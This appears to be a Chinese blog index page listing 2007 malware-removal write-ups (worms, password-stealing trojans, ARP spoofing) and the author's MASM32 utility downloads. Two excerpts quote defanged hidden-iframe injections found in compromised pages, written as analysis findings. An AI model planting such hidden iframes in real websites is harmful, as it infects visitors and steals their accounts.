- 博客(20)
- 资源 (53)
- 问答 (1)
- 收藏
- 关注
原创 ARP病毒自动加入传播Trojan.PSW.Win32.OnlineGames的代码
ARP病毒自动加入传播Trojan.PSW.Win32.OnlineGames的代码endurer 原创2007-07-31 第1版前两天,一位网友反映他最近打开网页显示都是乱码。让他把网页源代码传过来分析,发现网页首部被加入代码:/---<iframe src=hxxp://**.9**-*6*.in/n.js width=1 height=1></iframe>---/hxxp
2007-07-31 23:10:00 1895
原创 遭遇Worm.Win32.Viking,Worm.Win32f.ysv,Trojan.PSW.Win32.OnlineGames等
遭遇Worm.Win32.Viking,Worm.Win32f.ysv,Trojan.PSW.Win32.OnlineGames等endurer 原创2007-07-30 第1版刚才,“遭遇Worm.Viking.tc,Trojan.PSW.Win32.OnlineGames等”一文中的朋友又来求援,说电脑又出现上次的症状……过去一看,系统托盘区里小红伞的监控图标不见了,询问得知是他卸载了
2007-07-30 22:04:00 3481
原创 某论坛被挂马 down.exe / Virus.Win32.AutoRun.z / Trojan.PWS.Maran.262
某论坛被挂马 down.exe / Virus.Win32.AutoRun.z / Trojan.PWS.Maran.262endurer 原创2007-07-28 第2版 补充 Kaspersky 的回复2007-07-28 第1版打开该论坛中偶常去的版面,瑞星提示有可疑文件下载运行。用Google搜索,果然Google已经标出来了:http://www.google.cn/sea
2007-07-28 16:18:00 2174
原创 遭遇Worm.Win32.Viking.lm/Worm.Viking.tc,Trojan.PSW.Win32.OnlineGames等2
遭遇Worm.Win32.Viking.lm/Worm.Viking.tc,Trojan.PSW.Win32.OnlineGames等2endurer 原创2007-07-26 第1版看到 C:/WINDOWS/RichDll.dll 和 O4 - HKLM/../Run: [load] C:/WINDOWS/uninstall/rundl132.exe,就让偶想起Viking……停止
2007-07-26 18:17:00 2031
原创 遭遇Worm.Win32.Viking.lm/Worm.Viking.tc,Trojan.PSW.Win32.OnlineGames等1
遭遇Worm.Win32.Viking.lm/Worm.Viking.tc,Trojan.PSW.Win32.OnlineGames等1endurer 原创2007-07-25 第1版昨天中午,一位朋友的电脑开机时出现一堆出错提示框,无法通过任务栏上程序图标切换程序,电脑反应很慢,有时自动重启……让偶帮忙检修。下载 pe_xscan 扫描 log 并分析,发现(进程模块部分有省略):/
2007-07-25 23:18:00 1687
原创 遭遇auto.exe,Hack.ArpCheater.a(ARP欺骗工具),Trojan.PSW.ZhengTu等2
遭遇auto.exe,Hack.ArpCheater.a(ARP欺骗工具),Trojan.PSW.ZhengTu等2endurer 原创2007-07-24 第1版很奇怪,今天中午在一位网友的电脑遇到与此相似的东东,pe_xscan 的 log 中的 O2、O4、O23、O24都相似,各盘下也有auto.exe,但多了一个:O20 - AppInit_DLLs: mybpri.dll,修复
2007-07-24 18:05:00 2538
原创 遭遇auto.exe,Hack.ArpCheater.a(ARP欺骗工具),Trojan.PSW.ZhengTu等1
遭遇auto.exe,Hack.ArpCheater.a(ARP欺骗工具),Trojan.PSW.ZhengTu等1endurer 原创2007-07-23 第1版一位网友说他的电脑昨晚使用时出现蓝屏,刚才打开电脑后,进入桌面后时弹出对话框,提示explorer.exe出错,确定后任务栏自动消失,杀毒软件监控也没见影子……让偶通过QQ远程协助。下载 pe_xscan 扫描 log并分析
2007-07-23 23:37:00 2010
原创 遭遇 Backdoor.Win32.Agent.amb / serivces.exe
遭遇 Backdoor.Win32.Agent.amb / serivces.exeendurer 原创2007-07-23 第1版有网友说,他用U盘从另一台电脑A中拷贝了文件,回来把U盘接入电脑后,卡巴报告发现病毒。请偶远程协助检查电脑A。下载 pe_xscan 扫描 log并分析,发现如下可疑项:/===pe_xscan 07-07-21 by Purple Endurer2007
2007-07-23 13:49:00 1383
原创 遭遇使用映像劫持/IFEO 的 Worm.Win32.Avkiller.i/gavuusg.exe /v2
遭遇使用映像劫持/IFEO 的 Worm.Win32.Avkiller.i/gavuusg.exeendurer 原创2007-07-21 第2版 补充 Kaspersky 的回复2007-07-21 第1版 中午时一位网友说他的电脑中的金山毒霸和网镖无法启动,估计是中标了,让偶通过QQ远程协助。 下载 pe_xscan,扫描log并分析,发现如下可疑项:/===pe_xsca
2007-07-22 22:35:00 1937
原创 遭遇使用映像劫持/IFEO 的 Worm.Win32.Avkiller.i/gavuusg.exe
遭遇使用映像劫持/IFEO 的 Worm.Win32.Avkiller.i/gavuusg.exeendurer 原创2007-07-21 第1版 中午时一位网友说他的电脑中的金山毒霸和网镖无法启动,估计是中标了,让偶通过QQ远程协助。 下载 pe_xscan,扫描log并分析,发现如下可疑项:/===pe_xscan 07-06-23 by Purple Endurer200
2007-07-21 18:25:00 3377
原创 一个U盘居然带了三个病毒文件Ghost.pif,cmdwin.exe,servet.exe
一个U盘居然带了三个病毒文件Ghost.pif,cmdwin.exe,servet.exeendurer 原创2007-07-20 第1版下午,一位同事拿U盘过来用。用WinRAR查看,居然有三个病毒文件。文件说明符 : I:/Ghost.pif属性 : ASH-获取文件版本信息大小失败!创建时间 : 2007-7-12 9:3:34修改时间 : 2007-7-18 16:48:14访
2007-07-20 22:20:00 1960
原创 开机自动弹出脱机工作对话框?原来是 Virus.Win32.AutoRun.bv 作怪
开机自动弹出脱机工作对话框?原来是 Virus.Win32.AutoRun.bv 作怪endurer 原创2007-07-18 第1版一位朋友说的他的电脑出现了奇怪的故障:一开机就弹出对话框,提示IE是否脱机工作,有时还没处理,就连续弹出3-4个这样的对话框,导致系统失去响应。让偶帮忙处理。打开任务管理器强行结束这些对话框任务,结果explorer.exe也自动退出了。在任务管理器
2007-07-18 21:49:00 5397
原创 遭遇Trojan-PSW.Win32.OnLineGames,Trojan.PSW.Win32.Agent,Virus.Win32.AutoRun.er等/v2
遭遇Trojan-PSW.Win32.OnLineGames,Trojan.PSW.Win32.Agent,Virus.Win32.AutoRun.er等endurer 原创2007-07-18 第2版 补充 Kaspersky 的回复2007-07-17 第1版有网友的电脑中的卡巴斯基最近经常报告发现病毒,如:/---感染: 木马程序 Trojan-PSW.Win32.OnLineG
2007-07-17 21:32:00 2102
原创 鼠标有时乱跑?毒霸、卡巴冲突还是BackDoor.PcClient引起?
鼠标有时乱跑?毒霸、卡巴冲突还是BackDoor.PcClient引起?endurer 原创2007-07-16 第1版昨晚一位网友说他的电脑的鼠标有时会乱跑,让偶QQ远程协助。有点怀疑网友的电脑中了后门。下载 pe_xscan 扫描 log 分析,发现:/---pe_xscan 07-06-23 by Purple Endurer2007-7-15 21:28:25Windows
2007-07-16 12:42:00 1381
原创 Windows更新网站被黑还是被ARP病毒捉弄了?Virus.Win32.AutoRun.am
Windows更新网站被黑还是被ARP病毒捉弄了?Virus.Win32.AutoRun.amendurer 原创2007-07-11 第1版今早打开电脑,发现有Windows更新,自动更新速度有点慢,于是手动打开http://www.windowsupdate.com/,不料看到的是一堆乱码~选择开始菜单中的“Windows Update”,打开 http://windowsupda
2007-07-11 20:03:00 2044
原创 一堆垃圾软件成Win XP启动绊脚石~
一堆垃圾软件成Win XP启动绊脚石~endurer 原创2007-07-10 第1版一位网友,电脑原装有金山毒霸,不幸中标。换装卡巴6,扫荡出一片,但windows启动时还是很慢,让偶帮忙检修。用 pe_xscan 扫描 log 并分析,发现如下可疑项:/---pe_xscan 07-06-23 by Purple Endurer2007-7-10 18:27:2Windows XP
2007-07-10 21:56:00 1321
原创 用MASM32写的DLL等内存模块卸载程序FreeDLL 0.0.0001 beta3
一、版本更新版本 日期 说明0.0.0001 beta3 2007-07-05 1、更换了尝试以SYSTEM帐户运行的方法;2、支持文件拖放;3、增加窗口置顶选项文件说明符 : F:/masm32/works/FreeDLL/8.exe属性 : A---语言 : 中文(中国)文件版本 : 0.0.0001 beta3说明 : FreeDLL版权 : PurpleEndur
2007-07-05 23:05:00 1769 6
原创 明珠暗投 系统分析和修复利器HijackThis暴缺陷……O20、O21不翼而飞
endurer 原创2007-07-04 第1版有一位网友的电脑使用的是Win XP,不小心安装了微软正版增值计划更新程序,现在任务栏右下角出现了一个蓝色五角星符号,感觉不爽,让偶帮助弄掉。这个偶以前用HijackThis轻松解决过,轻车熟路,打开 http://endurer.ys168.com,顺手 下载了排在最上面的 HijackThis 2.0.0.0 Beta,解压运行,扫描,晕
2007-07-04 18:51:00 1307
原创 如何安全使用U盘等移动存储设备
如何安全使用U盘等移动存储设备endurer 原创2007-07-06 第2版 补充:预防移动存储设备中病毒发作的措施2007-07-02 第1版现在通过移动存储设备传播的恶意程序的越来越多了。这些通过移动存储设备传播的恶意程序一般是通过autorun.inf这个文件利用Windows XP的自动播放功能来实现的。那么我们如何安全使用移动存储设备呢?一、安全使用方法按住SHIFT键,插
2007-07-03 22:56:00 2863
原创 小心!用baidu搜索 得了音乐 失了QQ 原来搭送了Trojan.PSW.Win32.QQPass.qis
endurer 原创2007-07-01 第1版有一位网友反映,他用baidu搜索音乐,打开搜索结果中的链接网页后,QQ号被盗~BTW,偶找音乐都是用sogou的~检查网友提供的这个网页,发现包含代码:/---<iframe src=hxxp://w**.c**yshop.net/gg.html?id=101 width=0 height=0></iframe>---/hx
2007-07-01 22:35:00 1446
用 HTML + JavaScript 打造的渐进式延迟法定退休年龄测算器
2024-09-15
免费图片浏览软件 IrfanView 64-bit 英文版
2024-06-30
MASM32编程通过WMI获取Windows用户帐户信息的控制台程序,小巧精炼,适合bat调用,重定向输出
2023-09-03
HTML+JavaScript+CSS DIY 分隔条splitter代码
2023-09-02
sysInfo(电脑系统信息)
2023-05-29
TcpStatC-增加显示PID和对应进程文件说明符
2022-08-14
TcpStatC.zip
2022-07-31
MASM32v11中的kernl32p.inc和kernl32p.lib存在bug,这是修正后的版本。
2022-07-30
MASM32v11版本中kernel32.inc和Kernel32.lib修正版。
2022-07-30
sysInfo-0_0_0001.zip
2021-11-04
Word启动故障修复程序FixWord
2017-01-16
MASM32编程实现运行时自动提示要求以管理员帐户来运行的演示源代码和exe
2017-01-05
用MASM32来DIY判断字符串1是否为字符串2的子串的函数演示代码(源码+exe)(应用lstrcmp,区分大小写)
2014-10-16
用MASM32来DIY一个判断字符串1是否为字符串2的子串的函数演示代码(源码+exe)(应用repe cmpsb指令,区分大小写)
2014-10-04
添加浮动按钮点击滚动到网页底部的纯JavaScript演示代码
2014-09-06
用MASM32写的 系统托盘图标管理员 TrayIconMan 0.0.0003
2012-02-17
定时关机、重启、注销、待机、修眠程序ClosePC 0.0.0.1 beta4
2011-08-04
用MASM32编写的网络时间同步/校正程序-adjTime.exe
2011-06-11
查看备份系统开/关机&用户登录/注销记录BootClos 0_0_0001_beta2
2011-05-26
BootClos 0.0.0001 beta1—查看、备份系统开关机记录
2011-05-21
DelUninstall_0_0_0001Beta4
2011-01-16
Speaker——用MASM32编写的文本朗读程序(7KB)
2010-07-24
MASM32编程通过WMI获取杀毒软件信息(源代码+exe)
2010-05-24
MASM32编程通过WMI获取Windows计划任务(源代码+EXE下载)
2010-04-19
用MASM32写的定时关机、重启、注销程序ClosePC 0.0.0.1beta1
2010-03-06
MASM32编程由WMI获取BIOS、主板、硬盘、CPU、网卡的信息(源代码+exe)
2009-10-21
FileInfo 0.0.0012
2009-10-09
DelUninstall_0_0_0001Beta3
2009-06-02
分析、获取命令行参数的MASM32演示程序
2009-04-16
IEFO_Man 0.0.0.1 beta1(映像劫持项目管理程序)
2009-03-03
MASM32编程获取任务栏高度
2008-09-21
FileInfo 0.0.0011
2008-07-17
FileInfo 0.0.0010 --修正bug,提升速度
2008-06-29
FileInfo 0.0.0009 -- 增强文件数字签名的检测
2008-06-09
FileInfo 0.0.0008
2008-05-31
Windows 10 计算器 显示的是多少?
2022-07-31
TA创建的收藏夹 TA关注的收藏夹
TA关注的人